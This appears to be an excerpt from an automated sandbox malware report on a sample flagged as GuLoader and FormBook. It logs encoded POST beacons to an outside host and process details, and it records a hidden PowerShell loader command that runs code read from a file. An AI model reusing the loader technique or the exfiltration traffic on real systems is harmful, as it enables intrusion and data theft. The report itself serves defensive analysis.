                                                                      Data Raw: 39 62 35 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 74 69 74 6c 65 3e 53 69 74 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 7b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 3a 23 41 33 41 39 41 43 3b 2d 2d 63 6f 6c 6f 72 44 65 66 61 75 6c 74 54 65 78 74 43 6f 6c 6f 72 43 61 72 64 3a 23 32 44 33 42 34 31 3b 2d 2d 63 6f 6c 6f 72 42 67 41 70 70 3a 72 67 62 28 31 34 2c 20 33 30 2c 20 33 37 29 3b 2d 2d 63 6f 6c 6f 72 42 67 49 6e 76 65 72 73 65 3a 68 73 6c 28 31 37 35 2c 20 34 38 25 2c 20 39 38 25 29 3b 2d 2d 63 6f 6c 6f 72 54 65 78 74 4d 75 74 65 64 3a 72 67 62 28 31 30 30 2c [TRUNCATED]
                                                                      Data Ascii: 9b5<!doctype html><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no"><title>Site not found</title><style>:root{--colorDefaultTextColor:#A3A9AC;--colorDefaultTextColorCard:#2D3B41;--colorBgApp:rgb(14, 30, 37);--colorBgInverse:hsl(175, 48%, 98%);--colorTextMuted:rgb(100, 110, 115);--colorError:#D32254;--colorBgCard:#fff;--colorShadow:#0e1e251f;--colorErrorText:rgb(142, 11, 48);--colorCardTitleCard:#2D3B41;--colorStackText:#222;--colorCodeText:#F5F5F5}body{font-family:-apple-system,BlinkMacSystemFont,segoe ui,Roboto,Helvetica,Arial,sans-serif,apple color emoji,segoe ui emoji,segoe ui symbol;background:#34383c;color:#fff;overflow:hidden;margin:0;padding:0;font-size:1rem;line-height:1.5}h1{margin:0;font-size:1.375rem;line-height:1.2}.main{position:relative;display:flex;flex-direction:column;align-items:center;justify-content:center;height:100vh;width:100vw}.card{position:relative;display:flex;flex-direction:column;width:75%;max-width: [TRUNCATED]
                                                                      Nov 28, 2024 10:07:56.785041094 CET | 1236 | IN | Data Raw: 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 65 31 65 32 35 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 32 70 78 20 34 70 78 20 72 67 62 61 28 31 34 2c 33 30 2c 33 37 2c 2e 31 36 29 7d 61 7b
                                                                      Data Ascii: nd:#fff;color:#0e1e25;border-radius:8px;box-shadow:0 2px 4px rgba(14,30,37,.16)}a{margin:0;font-weight:600;line-height:24px;color:#054861}a svg{position:relative;top:2px}a:hover,a:focus{text-decoration:none}a:hover svg path{fill:#007067}p:last
                                                                      Nov 28, 2024 10:07:56.785056114 CET | 512 | IN | Data Raw: 35 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 34 30 34 70 61 67 65 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 63 6f 6d 6d 75 6e 69 74 79 5f 74 72 61 63 6b 69 6e 67 22 3e 22 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 20 73 75 70 70 6f 72 74 20 67 75 69
                                                                      Data Ascii: 5?utm_source=404page&utm_campaign=community_tracking">"page not found" support guide</a>for troubleshooting tips.<p style=color:var(--colorTextMuted)>Netlify Internal ID:<span class="inline-code request-id"><code>11b01JDS0DTXNT6WHCKFYNRX


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      18 | 192.168.2.6 | 49742 | 103.168.172.37 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:08:03.013453960 CET | 773 | OUT | POST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 211
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 54 56 53 47 4a 74 65 78 30 6f 30 7a 72 51 38 74 32 71 58 7a 47 66 44 6a 36 70 6d 31 7a 4d 7a 64 37 5a 45 41 72 77 46 53 72 4e 71 65 35 2f 5a 73 49 33 45 50 50 66 70 36 6f 54 41 45 4f 78 44 48 43 62 67 79 79 53 4a 4f 33 4b 52 36 36 30 67 4d 79 52 33 6d 37 47 6c 4a 61 65 77 35 35 57 66 45 74 72 5a 43 44 42 64 57 33 76 45 7a 67 66 67 63 32 7a 55 78 41 55 6d 43 67 50 32 32 34 79 55 69 51 63 73 2b 71 59 75 37 67 77 6b 61 4d 50 4f 77 61 6f 48 4e 69 6b 35 79 36 72 32 67 78 5a 42 58 78 42 6f 6e 74 69 7a 39 4b 63 79 7a 6d 44 34 79 46 33 37 46 56 30 65 54 50 2f 54 4c 2b 2b 6e 66
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJTVSGJtex0o0zrQ8t2qXzGfDj6pm1zMzd7ZEArwFSrNqe5/ZsI3EPPfp6oTAEOxDHCbgyySJO3KR660gMyR3m7GlJaew55WfEtrZCDBdW3vEzgfgc2zUxAUmCgP224yUiQcs+qYu7gwkaMPOwaoHNik5y6r2gxZBXxBontiz9KcyzmD4yF37FV0eTP/TL++nf


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.6 | 49743 | 103.168.172.37 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:08:05.681632042 CET | 797 | OUT | POST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 235
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 52 30 43 47 46 75 6d 78 78 49 30 79 75 51 38 74 6a 36 58 76 47 66 50 6a 36 73 44 6f 7a 2f 58 64 37 34 30 41 71 78 46 53 71 4e 71 65 33 66 5a 6a 58 6e 45 45 50 66 31 59 6f 57 34 45 4f 78 48 48 43 5a 49 79 31 67 68 4e 32 61 52 34 6a 45 67 4f 32 52 33 6d 37 47 6c 4a 61 65 31 63 35 57 48 45 74 37 70 43 52 77 64 56 70 2f 45 73 6f 2f 67 63 79 7a 55 39 41 55 6d 67 67 4b 4b 63 34 32 6b 69 51 64 63 2b 71 4a 75 34 37 67 6b 41 42 76 50 41 57 61 6d 4b 37 57 30 6a 35 74 6e 44 79 4c 70 6f 39 58 31 39 78 52 7a 65 59 4d 53 78 6d 42 67 41 46 58 37 76 58 30 6d 54 64 6f 66 73 78 4b 43 38 4d 43 37 4e 4f 7a 51 30 58 77 50 30 51 76 78 31 6f 62 4d 56 73 77 3d 3d
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJR0CGFumxxI0yuQ8tj6XvGfPj6sDoz/Xd740AqxFSqNqe3fZjXnEEPf1YoW4EOxHHCZIy1ghN2aR4jEgO2R3m7GlJae1c5WHEt7pCRwdVp/Eso/gcyzU9AUmggKKc42kiQdc+qJu47gkABvPAWamK7W0j5tnDyLpo9X19xRzeYMSxmBgAFX7vX0mTdofsxKC8MC7NOzQ0XwP0Qvx1obMVsw==
                                                                      Nov 28, 2024 10:08:06.770634890 CET | 582 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:06 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_5b4d2af7f47172ab0c7e3938fb93bc67
                                                                      Content-Encoding: br
                                                                      Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.6 | 49744 | 103.168.172.37 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:08:08.423368931 CET | 1810 | OUT | POST /ygu8/ HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Origin: http://www.lucelight.info
                                                                      Referer: http://www.lucelight.info/ygu8/
                                                                      Cache-Control: no-cache
                                                                      Content-Length: 1247
                                                                      Connection: close
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Data Raw: 38 6a 54 34 6b 4c 3d 33 46 2f 55 71 53 53 36 47 45 70 4a 52 30 43 47 46 75 6d 78 78 49 30 79 75 51 38 74 6a 36 58 76 47 66 50 6a 36 73 44 6f 7a 2f 66 64 38 4b 38 41 6f 57 78 53 77 4e 71 65 2f 2f 59 45 58 6e 45 6a 50 66 74 63 6f 57 39 7a 4f 7a 50 48 42 34 6f 79 77 52 68 4e 76 71 52 34 2b 30 67 54 79 52 33 4a 37 43 42 4e 61 66 46 63 35 57 48 45 74 39 46 43 54 68 64 56 72 2f 45 7a 67 66 67 59 32 7a 55 52 41 51 44 64 67 4c 61 6d 34 46 73 69 51 39 4d 2b 35 4c 47 34 6d 77 6b 65 43 76 50 59 57 61 71 46 37 57 6f 76 35 74 36 55 79 4c 64 6f 2f 79 73 45 73 68 50 30 50 75 2b 6f 6d 6a 55 2b 4e 79 50 7a 51 33 32 2b 54 4f 61 52 34 37 37 55 4d 57 50 56 4f 7a 70 73 57 68 47 56 62 62 5a 6a 6b 62 4a 69 35 51 73 54 2b 6b 70 6e 54 33 6a 31 73 65 70 41 32 6b 34 4e 6e 54 57 4f 53 6c 34 50 42 31 4e 4f 37 49 30 70 57 30 45 6e 6b 4d 36 4f 35 49 61 51 36 73 45 46 38 71 2f 34 71 61 4b 2b 4e 79 39 77 71 4f 32 78 30 51 34 56 44 6b 70 43 76 75 4b 4b 54 6c 4b 38 74 44 69 35 57 4c 73 74 69 53 6d 34 45 70 65 72 37 56 6d 44 47 59 33 [TRUNCATED]
                                                                      Data Ascii: 8jT4kL=3F/UqSS6GEpJR0CGFumxxI0yuQ8tj6XvGfPj6sDoz/fd8K8AoWxSwNqe//YEXnEjPftcoW9zOzPHB4oywRhNvqR4+0gTyR3J7CBNafFc5WHEt9FCThdVr/EzgfgY2zURAQDdgLam4FsiQ9M+5LG4mwkeCvPYWaqF7Wov5t6UyLdo/ysEshP0Pu+omjU+NyPzQ32+TOaR477UMWPVOzpsWhGVbbZjkbJi5QsT+kpnT3j1sepA2k4NnTWOSl4PB1NO7I0pW0EnkM6O5IaQ6sEF8q/4qaK+Ny9wqO2x0Q4VDkpCvuKKTlK8tDi5WLstiSm4Eper7VmDGY3GDLxXPjx7rmWhle6EERsDcU4TZZLMPDeNL7mUBs63qp/Al1OLNUfAGgfeKSQsEoYoG2c1mgctLB5PJ+/SSCEj04RT89dNgk2hTiReL/U0IUfihdx5hnY2eR9eFBERw3GJkgV7BivhQpgj8exH2GWVZievvAAmh7RNFSFxjtdY5iHSgfo9mG1li6MC4WBZjFwYm8GMVm9qEbouszCL/ZNB30OAP1Bf3T0bGG+mWRzW0VbYdDzS9vI5jQ28csTNvwAqRZiSxpwLvbK/stn9cFR9OuSalDQdTOo7deSmFU9b71JjFBAFMuYTUS5JBXQrJO6JoW/qwWt43q5Bnzo3PtTo3C/FAvG63Hh4k9q1F5N6T4jnQN3Ks1WPlGS/JzOEg6dgM6NdWKL8D9a5dIdAcujEJUVj3+PuynIHl1b/wt87t2gEIQjEjL9alJwIcwDEEB5pddH3alCvWr0FV66pvVKw/kDXPN9yVtlZ4fSVJu5amZFITedGHDelYRtiU9a5UX8BrMliw0i+V9/+yPZQse9TGRVty2UziAWqOdrO89mAjiookUknks7UxDy0uCmvCR/h6rG2IWpb+z6VXtcsl5k3vOx8TvGtKk6ua9P1lb5y4r3OJVXs8z9JZG/2WrP1PXSkPJk3glqiSCVIEsGQAR8kMFjmNxeVTvE6N [TRUNCATED]
                                                                      Nov 28, 2024 10:08:09.552851915 CET | 582 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:09 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_c275695ec835c24b79fdf1b98c0f041e
                                                                      Content-Encoding: br
                                                                      Data Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.6 | 49745 | 103.168.172.37 | 80 | 6404 | C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 28, 2024 10:08:11.082936049 CET | 516 | OUT | GET /ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat HTTP/1.1
                                                                      Host: www.lucelight.info
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
                                                                      Nov 28, 2024 10:08:12.231089115 CET | 808 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Thu, 28 Nov 2024 09:08:12 GMT
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Content-Length: 544
                                                                      Connection: close
                                                                      x-backend: phl-web-03
                                                                      X-Frontend: phl-frontend-01
                                                                      X-Trace-Id: ti_0e1ea0d4fccdbcb1b40b9e304d7b0d5e
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>


                                                                      Target ID:0
                                                                      Start time:04:04:09
                                                                      Start date:28/11/2024
                                                                      Path:C:\Users\user\Desktop\Salmebogs(1).exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Salmebogs(1).exe"
                                                                      Imagebase:0x400000
                                                                      File size:552'510 bytes
                                                                      MD5 hash:B5948D19A341BC22C750D129F41A55AE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:04:04:10
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes)
                                                                      Imagebase:0x220000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.3459194862.000000000BAC1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:04:04:10
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:6
                                                                      Start time:04:06:07
                                                                      Start date:28/11/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe"
                                                                      Imagebase:0x400000
                                                                      File size:552'510 bytes
                                                                      MD5 hash:B5948D19A341BC22C750D129F41A55AE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.3666544295.0000000003F01000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 21%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:7
                                                                      Start time:04:06:21
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe"
                                                                      Imagebase:0x690000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:04:06:23
                                                                      Start date:28/11/2024
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\svchost.exe"
                                                                      Imagebase:0xea0000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:9
                                                                      Start time:04:06:36
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe"
                                                                      Imagebase:0x690000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:10
                                                                      Start time:04:06:48
                                                                      Start date:28/11/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff728280000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:19.6%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:22%
                                                                        Total number of Nodes:1307
                                                                        Total number of Limit Nodes:27
